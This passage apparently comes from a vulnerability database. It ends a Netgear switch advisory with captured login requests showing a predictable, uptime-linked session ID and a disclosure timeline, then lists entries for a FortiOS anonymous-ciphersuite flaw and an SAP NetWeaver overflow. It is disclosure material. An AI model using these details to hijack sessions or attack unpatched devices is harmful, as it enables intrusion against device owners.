Another issue is represented by the session ID which seems to be predictable and related to uptime of the switch. After the first login within a minute after power-on, the following session id is set by the switch. For each new login request, the switch was disconnected from the power supply and reconnected. After some time, the ID changes again.
##### Request 1
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=test
##### Response 1
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
##### Request 2
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=walla
##### Response 2
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
##### Request 3
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=secretPass
##### Response 3
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
## Fixed Versions
No updates are currently available.
Password Disclosure:
Fixed in version 1.4.0.2
## History
10.08.2015 - Initial contact to Netgear via support chat
10.08.2015 - Set preliminary disclosure date
11.08.2015 - Netgear Support confirms findings
01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues
27.01.2016 - Public disclosure
| VAR-201409-0388 | CVE-2014-0351 | FortiNet FortiGate and FortiWiFi appliances contain multiple vulnerabilities |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
The FortiManager protocol service in Fortinet FortiOS before 4.3.16 and 5.x before 5.0.8 on FortiGate devices does not prevent use of anonymous ciphersuites, which makes it easier for man-in-the-middle attackers to obtain sensitive information or interfere with communications by modifying the client-server data stream. Fortinet FortiGate and FortiWiFi appliances are susceptible to man-in-the-middle attacks (CWE-300) and a heap-based overflow vulnerability (CWE-122). In addition, JVNVU#96848844 publishes these as CWE-300 and CWE-122. CWE-300: Channel Accessible by Non-Endpoint ('Man-in-the-Middle') http://cwe.mitre.org/data/definitions/300.html CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.html By changing the data stream between client and server in a man-in-the-middle attack, important information may be obtained or communication may be interrupted. Fortinet FortiOS is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits will lead to other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. There is a security vulnerability in the Fortinet FortiOS 4.3.15 and earlier versions and FortiManager protocol service of FortiManager 5.x versions earlier than 5.0.8 on FortiGate devices. The vulnerability stems from the fact that the program does not verify the use of anonymous cipher suites
| VAR-201409-1160 | No CVE | SAP NetWeaver Dispatcher Integer Overflow Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. An integer overflow vulnerability exists in SAP NetWeaver Dispatcher. An attacker can exploit the vulnerability to conduct a denial-of-service attack